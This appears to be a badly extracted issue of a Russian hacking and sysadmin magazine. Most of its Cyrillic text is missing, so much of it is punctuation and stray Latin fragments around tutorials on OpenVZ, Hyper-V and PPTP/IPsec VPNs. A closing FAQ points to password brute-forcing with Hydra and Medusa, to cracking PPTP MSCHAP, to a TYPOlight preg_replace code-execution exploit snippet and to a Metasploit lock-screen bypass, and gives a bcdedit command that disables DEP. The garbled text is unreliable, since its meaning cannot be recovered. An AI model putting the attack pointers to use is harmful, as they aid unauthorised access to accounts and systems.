dest=/etc/cfengine2/cfagent.conf
mode=600
server=$(policyhost)
force=true
trustkey=true
,
CFEngine, ,
,
.
:
$ sudo /etc/init.d/cfengine2 restart
$ sudo crontab -e
0,30 * * * * /var/cfengine/bin/cfexecd -F
cron cfexecd,
CFEngine,

cfagent.conf
.
cfagent.conf ,
.
CFEngine ,
.
CFEngine ,
.
WWW
, , CFEngine. z
119
SYN/ACK
Nathan Binkert nat@synack.ru
>> SYN/ACK
PLANET VIP-882:
VoIP-

IP- PLANET
VIP-88x
> :
T.30, T.38
> :
1 WAN 10/100 Mbps RJ-45
1 LAN 10/100 Mbps RJ-45
8 RJ-11 (6xFXS, 2xFXO)
> :
Voice activity detection (VAD)
Comfort noise generation (CNG)
G.165/G.168 Echo cancellation
Dynamic Jitter Buffer
> :
H.323 v2/v3/v4 SIP (RFC 3261), SDP (RFC
2327), Symmetric RTP, STUN (RFC3489),
ENUM (RFC 2916), RTP Payload for DTMF
Digits (RFC2833), Outbound Proxy Support
> :
TCP/IP, UDP/RTP/RTCP, HTTP, ICMP, ARP,
NAT, DHCP, PPPoE, DNS
> :
G.711 (A-law / u-law), G.729 AB, G.723 (6,3
Kbps / 5,3 Kbps)
> :

QoS
IP TOS (IP Precedence) / DiffServ
NAT
PLANET VIP-882 VoIP-,

, .
6 FXS (
) 2 FXO (
).
IP- H.323v4 SIP 2.0,
G.711 (A-law
/ u-law), G.729 AB, G.723 (6,3 / / 5,3 /),
(-), H.323 Gatekeeper
SIP - (
8-
). , (VAD),
DTMF, G.165/G.168, (silence detection),

,

() .
Web-
( , , , ,
).

, Ethereal.
FXS- FXO,

120
> :
IP, PPPoE, DHCP
> :
WEB, RS-232 , Telnet
> :
12
> ( x x ):
300 x 160 x 40
.
PLANET VIP-882 NAT,

.
VoIP- (QoS)
-. VoIP-
DHCP-, SNTP-, DynDNS-,
Syslog- ( Web, FTP
), , VIP882,
.
IP- 15300 .
X 04 /135/ 10

HP ProLiant ML110 G6:
,

HP ProLiant ML110 G6
> ( ):
Intel Xeon X3430 (2.40 , 95 TDP, 8
, 1333 , Turbo 1/1/2/3)
Intel Xeon X3440 (2.53 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/2/3)
Intel Xeon X3450 (2.66 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/4)
Intel Xeon X3460 (2.80 , 95 TDP, 8
, 1333 , HT, Turbo 1/1/4/5)
> :
8 DDR3 PC3-10600E 1333 ,
4
>> SYN/ACK
> :
SATA- (4
)
SAS 3.5" 1,8
SATA 3.5" 3
> :
PCI-e Gen 1, x1 (x4 connector),
PCI 32-/33 3,3

PCI-e Gen 1, x4 (x8 connector)
PCI-e Gen 2, x16 (x16 connector)
> -:
1
2 PS/2
8 USB 2.0 (2 , 4 , 2 )
> :
(
1600x1200 16 bpp @ 75 , 64 )
DVD-ROM
TPM 1.2
> :
HP ProLiant
100 G6 Lights Out 100i
HP ProLiant ML110 G6 Easy Set-up CD
> :

NC107i
> :
1
1
> :
300
> :
Micro ATX (4U)
HP
, .

,
,
, , HP ProLiant ML110 G6
.
Intel Xeon
X3400 ( , ), Intel Turbo Boost,

, DDR3,
1333 . SATA-

SAS/SATA, 1,8
3 .
PCI
Express ( ) PCI. USB-,
.

HP Tower to Rack
Conversion Tray.

HP, ML110 G6 Lights-Out 100i,
, , ,
, KVM, , telnet,
,
X 04 /135/ 10
SMASH-CLP, DCMI 1.0, IPMI

2.0.

Easy Set-up CD.
TPM (Trusted
Platform Module) ( ).
Windows BitLocker, Windows Server 2008, TPM

, .
Microsoft Windows, Red Hat Enterprise Linux
SUSE Linux Enterprise Server.

16500 .
121
SYN/ACK

, , , . , ,
. ,
.
OPENVZ
: ,
,
.

OpenVZ (OpenVZ.
org) Linux, (Virtual
Environments, VE). ,
VE ( , ,

).
OpenVZ :

Linux.
( 4096
64 ),
,
1-3%.
,
, (venet)
IP . OpenVZ
:

,
,
.
OpenVZ Ubuntu/
Debian. 64-,
122
64- .
32- (, 4 )
. Ubuntu

LVM,

(Zero Downtime
Backup)
.
SELinux AppArmor. :
$ dmesg | grep SELinux
SELinux: Disabled at boot.
$ dmesg | grep -i AppArmor
AppArmor: AppArmor initialized
AppArmor: AppArmor Filesystem
Enabled
AppArmor
:
$ sudo/etc/init.d/apparmor stop
$ sudo update-rc.d -f apparmor remove
$ sudo apt-get remove apparmor
apparmor-utils
SELinux .
, selinux=0 , menu.
lst: kernel .... selinux=0, /etc/sysconfig/
selinux selinux=disabled. :
$ sudo setenforce 0
Ubunt' , , OpenVZ,
. ,
OpenVZ
.
OpenVZ RPM RHEL
Ubuntu 8.04 LTS.
, /etc/apt/sources.list
:
deb http://download.openvz.org/
ubuntu hardy experimental
,
:
$ sudo apt-get update
$ sudo apt-cache search openvz
:
$ sudo apt-get install linux-openvz
vzctl vzquota

, /etc/
sysctl.conf:
X 04 /135/ 10
$ sudo nano /etc/sysctl.conf

# , ARP
net.ipv4.conf.default.forwarding=1
net.ipv4.conf.default.proxy_arp=1
net.ipv4.ip_forward=1
net.ipv4.conf.all.rp_filter=1
net.ipv4.conf.default.send_redirects=1
net.ipv4.conf.all.send_redirects=0
# SysRq ( SysRq X_03_2008)
kernel.sysrq=1
:
$ sudo sysctl -p
VM IP-,
, OpenVZ NEIGHBOUR_DEVS all:
$ sudo nano /etc/vz/vz.conf
NEIGHBOUR_DEVS=all
(
):
WEBVZ
WebVZ (webvz.sf.net) OpenVZ, Ruby.
- (Webrick),
SQLite. WebVZ :
OpenVZ (, , ,
);
Host Node;
OpenVZ,
IP-;
- , , ;
OpenVZ;
VM;
;
.
, , . WebVZ
. 8887 8888
, firewall.
Ruby SQLite. Rails
(rubyonrails.org) , . ,
2.0.2,
WebVZ Rails 2.3.2 ( 2.3.5, 2.3.2). Ubuntu
Ubuntu on Rails Team (launchpad.net/~ubuntu-on-rails),
Ruby. , source.list:
$ grep openvz /boot/grub/menu.lst
, :
OpenVZ /vz.
,
:
deb http://ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu
hardy main
deb-src http://ppa.launchpad.net/ubuntu-on-rails/ppa/
ubuntu hardy main
, APT :
$ sudo ln -s /var/lib/vz /vz
/vz/template/cache
, ( wiki.openvz.org/Download/template/precreated).
Ubuntu:
$ wget -c http://download.openvz.org/template/
precreated/contrib/ubuntu-8.04.2-i386-minimal.tar.gz
$ sudo cp -v ubuntu-8.04.2-i386-minimal.tar.gz /vz/
template/cache
. ,
.
VM ,
.
OpenVZ, modernadmin.com/downloads/?d=ostemplates/xen.
X 04 /135/ 10
$ sudo apt-key adv --keyserver keyserver.ubuntu.com \

--recv-keys B6C6326781C0BE11
:
$ sudo apt-get install ruby rubygems libsqlite3-ruby \
sqlite3 irb libopenssl-ruby libreadline-ruby rdoc
,
rubygems, ,
:
$ sudo gem update --system
gem install ,
rubygems :
123
SYN/ACK
HyperV_Mon
INFO
OpenVZ
info
OpenVZ

. OpenVZ

(
Linux-),
OpenVZ
:

.

Authorization Manager
(AzMan.msc)

VM
Hyper-V.
$ wget -c http://rubyforge.org/frs/download.
php/60718/rubygems-1.3.5.tgz
$ tar xzvf rubygems-1.3.5.tgz
$ cd rubygems-1.3.5
$ sudo ruby setup.rb
$ sudo ln -s /usr/bin/gem1.8 /usr/bin/gem
Rails. , WebVZ 2.3.2, :

$ sudo gem install -v=2.3.2 rails
-v=2.3.2,
, WebVZ
,
RAILS_GEM_VERSION config/environment.rb.
:
$ rails -v
Rails 2.3.5
WebVZ .
WebVZ.
, Git.
:
$ sudo apt-get install git-core
WebVZ:
$ git-clone git://github.com/shuaibzahda/
webvz.git
DVD
dvd

,

OpenVZ + WebVZ
Ubuntu Linux.
124
webvz , /var. ,
:
$ cd webvz/
$ sudo ruby script/server
=> Booting WEBrick
=> Rails 2.3.5 application starting on
http://0.0.0.0:3000
=> Call with -d to detach
=> Ctrl-C to shutdown server
[2010-01-29 14:08:01] INFO WEBrick 1.3.1
[2010-01-29 14:08:01] INFO ruby 1.8.6 (2007-0924) [i486-linux]

[2010-01-29 14:08:01] INFO
WEBrick::HTTPServer#start: pid=6365 port=3000
, ,
, WebVZ
. ,
, '-d':
$ sudo ruby script/server -d
=> Booting WEBrick
=> Rails 2.3.5 application starting on
http://0.0.0.0:3000
/etc/init.d/webvz:
cd /usr/local/webvz/ && /usr/bin/ruby \
-d script/server
exit 0
: http://192.168.1.200:3000/. ,
admin admin123. WebVZ Containers,
OS-Templates, Configuration files, OpenVZ ( )
Users.
Containers Personalize ( ). 3-4
.
Users, , , .
admin,
Change Password.
Vtonf
Vtonf (http://sourceforge.net/projects/vtonf)
-

OpenVZ.
. Vtonf RedHat, Fedora
CentOS.
X 04 /135/ 10
Live Migration
WebVZ
,
(Administration) (Client).
OS-Templates OpenVZ. ,
, ,
,
OpenVZ.
, Containers
New Container ,
,
, , ID, , IP-, , DNS-
root. Create
.
- . , , , ,
.
OS-Templates Re-Create Template,
.
HYPERVM
HyperVM (lxcenter.org)
,
(VPS/VDS). ,
-, .
, HyperVM
Proxmox Virtual
Environment
Proxmox VE (http://pve.proxmox.com/wiki/Main_
Page) Linux

OpenVZ KVM.

web-
,

.
1.5
GPLv2
ISO- 327

DVD-.
X 04 /135/ 10
,
. ,
, ,
. ,
?
. Live Migration.
Hyper-V, XenEnterprise, VMware ( VMotion). (
60300 ), , VM
, TCP- .
: VM , ,
. VM, , .
, , .
VM ,
, .
,
- .
OpenVZ Xen.
, .

(Resource Plan),
: VPS,
, , .
Xen, OpenVZ,
,
,
OpenVZ Only Xen Only.

HyperVM ,
SSH, ,

, .

, Ajax.
IP-, , .
HyperVM ,
- Vaserv (
2009) LxLabs AGPL-3.0,
SVN .
, RHEL-based
( CentOS).
, : This Operating
System is Currently Not supported.

( virtualization-type xen/openvz/NONE):
HTTP://WWW
links
OpenVZ
openvz.org

OpenVZ wiki.
openvz.org/Download/
template/precreated
WebVZ webvz.
sf.net
HyperVM
lxcenter.org

HyperVM :
http://demo.hypervm.
com:8888
SCVMM
2008 microsoft.com/
systemcenter/
virtualmachinem
anager
PowerShell
management Library
for Hyper-V pshyperv.
codeplex.com
HVRemote code.
msdn.microsoft.com/
HVRemote
125
SYN/ACK

WebVZ
$ wget -c http://download.lxcenter.
org/download/hypervm/production/
hypervm-install-master.sh
$ sudo sh ./hypervm-install-master.sh
--virtualization-type=openvz
. , hypervm-install-master.
sh ,
hypervm-install-slave.sh.
HYPER-V
Microsoft Hyper-V,
Windows 2008 , Microsoft Hyper-V Server 2008
(, , ). Hyper-V

(X_02_2009),

,
,
.

Hyper-V
, Hyper-V Tools,
Hyper-V , Hyper-V
(Hyper-V Manager). ,
Win2k8 , Hyper-V.
, ,
,
(Server Core). Vista Hyper-V
(support.microsoft.com/kb/952627 support.microsoft.com/kb/970203). Win7
, Remote Server
Administration Tools for Windows 7 (RSAT),
, , Hyper-V, Active Directory,
DHCP, DNS, , RDP, BitLocker, GPO, Network Load Balancing ..
RSAT for Win7 ,
.

Windows Firewall:
126
HyperVM
> netsh advfirewall firewall set

rule group="Windows Management
Instrumentation (WMI)" new enable=yes

DCOM
DCOMcnfg.exe.

-
. , Hyper-V,
HVRemote (Hyper-V Remote
Management Configuration Utility, code.msdn.
microsoft.com/HVRemote).
,
, WF .
, , :
> cscript hvremote /add:synack\user
:
> cscript hvremote /remove:synack\
user

MMC Windows Firewall, :
> cscript hvremote.wsf /mmc:enable

:
> cscript hvremote.wsf /show
/target:computername

Hyper-V Powershell Snap in
(powershellhyperv.codeplex.com)
,
Hyper-V
.
,
Visual Studio.
PowerShell management Library for Hyper-V
(pshyperv.codeplex.com) 80

HVRemote
PowerShell-, , , VM,
, VHD-
VM.
- Hyper-V Web
Manager (HVWM, hvwm.codeplex.com),
Virtualization WMI,
VM,
.
HyperV_Mon (www.
tmurgent.com/tools.aspx)
VM
, . HyperV_Mon
, , VM.
Citrix Systems
IT-,
Citrix Essentials for Hyper-V
Express Edition (deliver.citrix.com/go/citrix/
ehvexpress).
Hyper-V, Fibre Channel
iSCSI .
, ,
SCVMM 2008 (System Center Virtual
Machine Manager, microsoft.com/systemcenter/
virtualmachinemanager),
, Hyper-V,
Microsoft Virtual Server 2005, VMware
ESX/ESXi, .

,
,
. ,

, ,

. z
X 04 /135/ 10
8.5
DVD
!
660 . !
? ?
.
.
( )

.
2100 .

72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru
1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

SYN/ACK
urban.prankster martin@synack.ru

VPN

.
,
VPN , , , . , ,
, .
.
VPN ?
: -
.
,
,
. LAN
,
.
PPPoE PPTP,
hostto-network. , ?
.
PPPoE PPTP :
, *nix.

. Windows PPPoE PPTP
,

.
, , ,
.

OpenVPN,
,
- NAT.
- VPN ,
,
128
, ,
.
,
. L2TP/
IPsec
,
, ,
,
PPPoE PPTP /
.
VPN,
,
IP, IP ,
,
PPTP,
, OpenVPN L2TP/IPsec,

.
PPPoE PPTP .
PPPOE
PPPoE (Point-to-point protocol
over Ethernet, RFC 2516) ,

.
Windows, *nix
. , PPP
,
.

PADI- (PPPoE
Active Discovery Initiation),
,
IP- ,
PPTP. , ,

, ,
.
,
PPPoE
.

*nix pppoe-discovery,
PADI
, MAC-.
# pppoe-discovery -I eth0
Access-Concentrator: MT-01
.
PPPoE ,
,
/etc/ppp/peers/
dsl-provider:
# nano /etc/ppp/peers/dsl-provider
plugin rp-pppoe.so
rp_pppoe_ac MT-01
eth0
X 04 /135/ 10

: DHCP, DNS . PPPoE

RADIUS. PPPoE . Ethernet, IP- . ,
,
. PPPoE . ,
PPPoE WiFi : .

WiFi Wired LAN, PPPoE .
, MTU.
, Ethernet- 1500 ,
, PPPoE, 1492
( PPPoE 6 PPP Protocol ID 2 ). Path MTU Discovery,
.
ICMP (
3, 4: Fragmentaion Needed and DF set, . www.oav.net/mirrors/
cidr.html). , - ICMP ,
. MTU . , :
> ping synack.ru -f -l 1492
, .
, 1492 .
X 04 /135/ 10
Windows MTU 1480 ,

.
, (
) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\
Ndiswan\Parameters\Protocols\0, REG_
DWORD :
ProtocolType 0x00000800;
PPPProtocolType 0x00000021;
ProtocolMTU MTU .
Linux pppd ifconfig. pppd :

# nano /etc/ppp/pppoe.conf
CLAMPMSS=1412
MTU, MSS
(Maximum Segment Size, ),
40 (20 IP 20 TCP),
MTU.
ifconfig MTU :
# ifconfig ppp0 mtu 1400
PPTP PPTP (Point-to-point tunneling

protocol) . PPTP
PPP IP-,
129
SYN/ACK
IPSEC
, .

() TCP- ( 1723).
( Generic Routing
Encapsulation, GRE).
PPPoE, PPTP
. , , IP- .
. , ,
,
. , PPTP
Windows (Microsoft
), .
*nix ,
pptp-client (pptpclient.
sf.net),
. MPPE

. MPPE
. , MPPE
Linux 2.6.14,

.
: PAP, CHAP, SPAP, MSCHAP v1 v2,
EAP. /
,
PPTP
. :
LM-, RC4, CHAP, MSCHAP v1
v2 .
asleap (willhackforsushi.com/
Asleap.html) PPTP
MSCHAP . , PPTP,
VPN ( , , ),
.
, PPTP
EAP-TLS (Extensible Authentication
Protocol-Transport Layer Security) . ,
,
130
NF_CONNTRACK_PPTP
PPTP
. ,
PPTP , VPN .

LAN,
VPN-.

,
VPN ,
.
PPTP
1723/TCP GRE
( 47):
iptables -A INPUT -p tcp -s IP_VPN_
-d _IP --sport 1723
-j ACCEPT
iptables -A INPUT -p gre -s IP_VPN_
-d _IP -j ACCEPT
iptables -A OUTPUT -d IP_VPN_
-s _IP -j ACCEPT
PF ,

(www.xakep.ru/magazine/
xa/109/160/1.asp), PPTP- FreeBSD/mpd
OpenBSD/poptop.
PPTP - NAT
, PPTP
NAT.
VPN .
Linux
ip_nat_pptp, :

THEGREENBOW IPSEC VPN CLIENT
# /sbin/modprobe ip_nat_pptp
. PF . ,
GRE-,
( ) IP-
PPTP
.
, PPTP
IPFW.
:
# vi /etc/rc.conf
firewall_enable="YES"
firewall_nat_enable="YES"
firewall_script="/etc/ipfw.gre"

:
X 04 /135/ 10
VPN
IP
KVPNC
VPN
*NIX
# vi /etc/ipfw.gre
#!/bin/sh
/sbin/ipfw -q /dev/stdin <<RULES
flush
nat 10 config if fxp0
add 10 nat 10 gre from any to any
add 11 nat 10 tcp from any to any dst-port pptp
add 12 nat 10 tcp from any pptp to any
add 11 nat 10 tcp from any to any dstport pptp
/etc/ipfw.gre :
# chmod +x /etc/ipfw.gre
PF PPTP
:
# vi /etc/pf.conf
no nat on $external proto gre all
no nat on $external proto tcp from any \
to any port = pptp
no nat on $external proto tcp from any \
port = pptp to any
pass quick on $external inet proto tcp from any \
to any port 1723
pass quick on $external inet proto tcp from any \
port 1723 to any
pass quick on $external inet proto gre \
from any to any
. PPTP
,
, Frickin PPTP Proxy (frickin.sf.net) pptpproxy
(mgix.com/pptpproxy).
OpenBSD 4.6-current npppd,
PPP L2TP, PPTP PPPoE.
SITE-TO-SITE VPN? .
, .
, ,
. VPN ,
: OpenVPN, L2TP/IPsec, PPTP,
X 04 /135/ 10
VPN IP, . DNS. TTL , DNS

. IP- VPN-
.
Dynamic
DNS. dyndns.org, dyndns.
dk, no-ip.com. DMOZ dmoz.org/Computers/
Internet/Protocols/DNS/DNS_Providers/Dynamic_DNS
VTun (vtun.sf.net), SSH VPN .

,
: ISA Server (
, X_05_2007), Kerio WinRoute Firewall
(- , X_09_2007), ITC Server
(trafficcontrol.ru) .. ,

site-to-site VPN OpenVPN. .
: Linux, *BSD, Solaris, Mac OS X, Windows
2000. OpenVPN
,
( OpenVPN
, X_04_2007
X_02_2008 ). SSL ,
,
, (

). ,
, NAT
.
IPsec,
, Windows ( XP/2k3SP2 ), *nix.

. IPsec *nix . *BSD
Linux IPsec. Linux
, ,
IPsec: transport mode, IPsec: tunnel mode, IPsec:
BEET mode, IP: AH transformation IP: ESP transformation
IP: IPComp transformation PF_KEY sockets, Networking support Networking options. IPComp (IP Payload
Compression Protocol).
Cryptographic API.

( CPU),
Hardware crypto Devices.
IPsec :
500/UDP ISAKMP (Internet Security Association Key
Management Protocol);
ESP ( 50) Encapsulated Security Payload, ;
INFO
info
PPTP VPN
Win2k8

,
][ 2009 .
PPPoE
PPTP
Linux
PPP
(X_05_2008).
,
OpenSSH,

2008 ,
.
131
SYN/ACK
IPSEC
MICROSOFT
AH ( 51) Authentification Header,

.
IPsec 500
AH/ESP.
iptables:
DYNDNS IP
# iptables -A INPUT -p udp --dport 500

-m state --state NEW -j ACCEPT
# iptables -A OUTPUT -p udp --dport 500
-m state --state NEW -j ACCEPT
# iptables -A INPUT -p esp -j ACCEPT
# iptables -A OUTPUT -p esp -j ACCEPT
# iptables -A INPUT -p ah -j ACCEPT
# iptables -A OUTPUT -p ah -j ACCEPT

IPsec-tools (ipsec-tools.sf.net).
IPsec , ,
NAT .

NAT-Traversal (NAT-T), ESP UDP (ESPinUDP)
4500/
UDP.
NAT-Traversal,
IPsec.
, , .
DD-WRT (dd-wrt.com),
FreeWRT (freewrt.org), OpenWRT (openwrt.
org), Midge (midge.vlad.org.ua) .
Linux ESPinUDP,
NAT-Traversal ipsec.conf:
: OPENBSD/ISAKMPD SHREW SOFT VPN

CLIENT
NAT-T WinXP,
HKEY_LOCAL_MACHINE\System\
CurrentControlSet\Services\IPsec
DWORD AssumeUDPEncapsulation
ContextOnSendRule
,
IPsec:
0 ( )
IP;
1 - NAT (NAT-T);
2 .
, Microsoft
Microsoft IPsec Diagnostic Tool,
IPsec-
.
WinXP/2k3/Vista/2k8.
PPTP IPsec,
Windows (Vista SP1, Win7 Win2k8)
Microsoft SSTP (Secure Socket
Tunneling Protocol, . VPN
][ 2008 ).
nat_traversal=yes
, IPsec,
Linux, : strongSwan (strongswan.org) Openswan
(www.openswan.org).
Windows NAT-T
2000/SP3 XP/SP2. -
132

IPSEC? Windows,
2000,
IPsec,
, .
.
TheGreenBow VPN Client (thegreenbow.com/
vpn.html),
,
-.
D-Link VPN Client IPsec ( 3DES/AES
NAT-T) VPN , D-Link.
, , , ,
KVpnc ( IPsec, IPsec/L2TP, PPTP,
OpenVPN, Cisco, Vtun SSH).
Shrew
Soft VPN Client (shrew.net),
Windows ( 2k Se7en), FreeBSD,
NetBSD, Linux. , IPsec-tools,
OpenSWAN, FreeSWAN, StrongSWAN Isakmpd.
, VPN-
.

. ,

. z
X 04 /135/ 10
UNITS
lozovsky@gameland.ru
PSYCHO:

:
-

, .
, 1500 . , , . ? !

. ,
? . - , ,

. , - ,

,
, ,
-
.
, , :

.
, , .
, :). ,
.
, - :
(, , ),
?
,
, ?

,
?

? ,
, (,
, .
).
, ,
, . ? ,
134
,
-. ( )

, . : , .

, :
,
.

,

. .

.

( , -
?). .
, $50
:).

,
,
.
,
Delphi 4 Pascal.
-
. , ,
- ,
,
,
.
,
, ,
,
, .
, , ,
, ,
, ,
:).
(,
), (
, ,
, ,
,
, , ,
) ,
-
.
,
.
.
. ,
,
. ,
.

, ,
. :
1. , .
,
,
, , . .
2.
. ,
?
3. X 04 /135/ 10
(
)
,
, .
, ,

,

, .

.

(
,
), (, ,
).
,

, (
,

,
,

..) ,

:
,
,
, ,
, . , ,
. ,
.
, :
,
, , . ,
, ,
? ? ,
.
:
4.
, .
(, ).

.
.
, , - -
. , , ,
.

. MadDoc:
. , ,
-
-, , ,
, , . , ,
-
, ,
.
? ! ,
- . ?
, , , .
.
,
?
X 04 /135/ 10
135
UNITS
,
,
, : I
want you!. ,
, .
,

.
, /

-. .
. , ,
(, -
- ,
), ,
.
1. ,
. ,
-
(),
.
2.
; , .
3. .

, ( )
. ,
136
,
;). ,
, :
, , , .
, , .
, ,
/, , .
.
.
, , .
(
,
, )
( , ,
..), ,
,
, . , -
: ,

,
. , , ,

, , , , ,
, , ,

:).
, . ,

, , , .

,

:).
, ,

,
.

( ). , , ,
.
, 430 plain texta :).
, .
, 7%
. 38%
, 55% . ,
.
.

, ,
(, ),
. ,
. ,

, ,

, , , , , . ,
,

:), .
. ,
,
X 04 /135/ 10
. !
][ , .
torrents.ru/rutracker.org !
!

, , . ,
, . , ,
, , , , - , ,

, .
. , , ,

, .
. , ,
,
, , , , ,
, 500
. , , 25
:).
,
,
, , , , . , :
- ,
, , , (-, ).
X 04 /135/ 10
137
UNITS
, .
. , .
, -
,
- :).
, :
, , . -
.
1. .
,
,
,
. ,
. , , ,

. .
.

,
. . , .
,
,
(
)
. :
(, -,
, -
138
?),
. ,
. ,
, , .
:
, ,
, .
, .
.
.
,
. , ,
,
.
.
, ,
. ,
, . . ,
,

, ,

.
, ,

.
2. .
, , :
, . ? ,
-
,
,
:).
, ,

, ,
. ( ,
), ,
(,
,
. ?),
,
. ? , . :
, ?
: -,
, , , , ,
!. ?
, ?
:
.
, , ,
.
,
.
X 04 /135/ 10
. ,

,
.

!
, (,
), ,

, , ,
,

, .
,
. , X 04 /135/ 10
,
,
:
. , ,
.
, .
,
:).
. ,
. ,
, -,
, .
][: , -
-?
..: . , . ,
, .
. ,
. : , , .
, . - :
, .
. , ,
. - .
. ,
- . , ,
, .
][: ! . - -, , . , - ?
.. , , .
: , .
. , ,
, .
: , . , ,
.
, , , .
, ,
. , ,
. ,
. , - .
, ,
, , ,
, , .
. ,
, , , , , .
, , , ,
,
100%
,
. , :). z
139
UNITS
Step twitter.com/stepah
faq
united
@real.xakep.ru
Q:
phpmyadmin-2.11.9.2 295 / 299 (98.66%)
). ?
CMS -
phpmyadmin-2.11.9.4 295 / 299 (98.66%)
A: vB
(fingerprinting)?
phpmyadmin-2.11.8.1 295 / 299 (98.66%)
A:
phpmyadmin-2.11.9.5 295 / 299 (98.66%)
Ruby
SQLite3 DB wafp (Web Application Finger
Printer).
:
1. -
, - CMS (,
javascript-, );
2. md5-
;
3. CMS.
phpMyAdmin (
/themes/darkblue_orange/img/b_info.png
):
phpmyadmin-2.11.8
:
1. ;
2.
;
3.
.
wafp.rb --verbose -p phpmyadmin

https://phpmyadmin.example.de
VERBOSE: request for "/themes/darkblue_
orange/img/b_info.png" produced
"Connection refused - connect(2)" for 1
times - retrying
295 / 299 (98.66%)
phpmyadmin-2.11.9.3 295 / 299 (98.66%)

phpmyadmin-2.11.9
295 / 299 (98.66%)
phpmyadmin-2.11.4
294 / 299 (98.33%)
phpmyadmin-2.11.5.2 294 / 299 (98.33%)

+-----------------------------------+
Q: ,
CMS?

www.mytty.org/
wafp.
(
),
http://sucuri.net/?page=docs&title=webappversion-detection.
CMS, (
)
WordPress . ,
Joomla Vulnerability Scanner
OWASP (www.owasp.org/index.
php/Category:OWASP_Joomla_Vulnerability_
Scanner_Project) CMS
Drupal Raz0r' (raz0r.name/drupalscan/).
found the following matches (limited to

10):
Q: , vBulletin
+------------------------------------+
phpmyadmin-2.11.9.1 296 / 299 (98.99%)
140
A: , , itdefence.ru/dbitems.
: .
,
PasswordsPro (www.insidepro.com/eng/
passwordspro.shtml).
,
forum.
insidepro.com.
Q: php-?
A: php-

( error_reporting
E_ALL) echo/print
( http://phpfaq.
ru/debug).
!

Expert Debugger (phpexperteditor.com), X 04 /135/ 10
CMS
PUNBB 1.2.X
QUICKSILVER FORUM
REFBASE (WEB REFERENCE DATABASE)
RUNCMS
SCRIPTEEN FREE IMAGE HOSTING SCRIPT
SHINOBU
SILVERSTRIPE
SLAED CMS
SMF 1.1.X
SMALLNUKE 2
SNEWS
SNITZ FORUMS 2000
TANGOCMS
TIKI WIKI
TINYPUG
TRIBIQ
TRITON CMS
USEBB
VANILLA
VBULLETIN 2.16
VBULLETIN 3.54
VIKINGBOARD
VOODOO CHAT
W-AGORA
WEBSITE BAKER
WORDPRESS <=2.3.3
WORDPRESS >=2.5
MD5($PASS) SHA-1

PHP Expert Editor.
DBG PHP Debugger,
IDE
.
:
PHP
;
breakpoints;
;
;
UTF-8;
profile;
IDE;
;

www.ankord.com.
Q:
ICQ-?
A: ICQ
Monitor (http://avtuh.ru/2009/11/27/icq-monitor.
html),
ICQ- (//).

(
)
. ,
QIP
:)
Q: FAQ
CMS .
?
X 04 /135/ 10
DES(PASSWORD, $SALT) $SALT = SUBSTR(EMAIL, 0, 2)

SHA1($USERNAME.$PASS) MD5($PASS)
MD5($PASS)
SHA1($USERNAME.$PASS)
MD5($PASS)
SHA-256
MD5($PASS)
"\\1")',
);
$strArticle = preg_
replace($arrSearch, $arrReplace,
$strArticle);
,

. ,
,
http://snipper.ru/
view/6/typolight-270-php-code-executionexploit.
Q: ,
MD5(MD5($PASS).$SALT)
MD5($PASS)
MD5($PHPBB3)
A: (WordPress, Drupal Joomla!),

, ,
CMS 10 .
,
.
,
.
, PHP
TYPOlight.
e ( ,
php-,

phpBB2) preg_replace():
-
?
A: ( http- ),
-
http://exploit.in/tools/anonym.php.
:
IP;
User agent ;
Hostname;
;
JavaScript: ;
( JavaScript);
-;
;

;
;
;
( IE).
JavaScript.
js
,
OS. ,
Google Analytics Piwik (www.piwik.org).
Q: 3-./system/libraries/Controller.php
protected function
printArticleAsPdf(Database_Result
$objArticle)
{
$strArticle = preg_
replace('/\?pdf=[0-9]*/i', '',
$strArticle);
$arrSearch = array
(
'@(<pre.*</pre>)@Use',
);
$arrReplace = array
(
'str_replace("\n", "<br />",
.
.
A:
http://3character.com, 3- ,
.
(, , ,
):
OMG.com, $80.000, 8/20/2009, Sedo.

com;
AMT.com, $100.000, 4/28/2007, Sedo.
com;
NHS.com, $151.300, 2/21/2006,
141
UNITS
Moniker.com;
SEX.com, $12.000.000, 1/25/2006,
Private Transaction.
, ,
:)
Q: .
,
,
.
: AFP, CVS, FTP, HTTP,
IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP,
PcAnywhere, POP3, PostgreSQL, rexec, rlogin,
rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2,
SVN, Telnet, VmAuthd, VNC.
,
. ,

,
, , ,
.
Q: -
(
LLLL, CCCC .. ?
Q: , DEP -
, ).
A: -
, ,
. .
, :
L - ;
N - ;
S - ;
C - ;
V - .

:
1. - (A, E, I, C, S, P, M, D, T);
2. (A, B, C, D, E, F, G, H, I, L, M, N, O, P,
R, S, T);
3. (J, K, U, V, W);
4. (Q, X, Y, Z).
A: DEP, , -
HTML-
Data Execution Prevention.

, ,
.
DEP
->
.

. ,
- .
,
DEP .
: bcdedit.exe /set {current} nx
AlwaysOff.
.
Q: ,
Jimm.
?
A:
www.icq.com/password , ,
(

:).
, :
1. forum.asechka.ru
ICQ Password Recalling (IPR) karas3d;
2.
Jimm IP 127.0.0.1 ;
3. .
UIN
.
:
1. http://forum.motofan.ru/index.
php?showtopic=147890 Jimm
ICQ Password Recovery;
2. , Open .rms Jimm;
3. Scan ,
.
.rms ,
motofan.ru
.
Q: THC-Hydra, , ,
( , ).
, -
Q: , ?
A: ,
,
.
lsass.exe , .
Metasploit'
(relentless-coding.blogspot.com/2010/02/
windows-vista-7-targets-for-screen.html).

scripts/meterpreter Metasploit'. , ,
, ,
.
Q:
?
A: , .
:
cmd.exe /v:on /c "for /F "delims=,

tokens=1" %i in ('dsquery computer
-limit 0') do set name=%i & set
name=!name:~4! & ,
!name!
?
A: Medusa (www.
foofus.net/jmk/medusa/medusa.html), 2.0.
-
142
,
dsquery ,

A: Ruby
iScanner (iscanner.isecur1ty.org).

iframe',
javascript, vbscript activex.
Q: , ,
(][
Userlevel! .
), ,
BSOD.
?
A: , -
,
TDSS ( Tidserv, TDL3
Alureon). . ,
(, ,
Vista, Windows 7). TDSS cleaning tool (www.norman.
com/support/support_tools/77201/en).
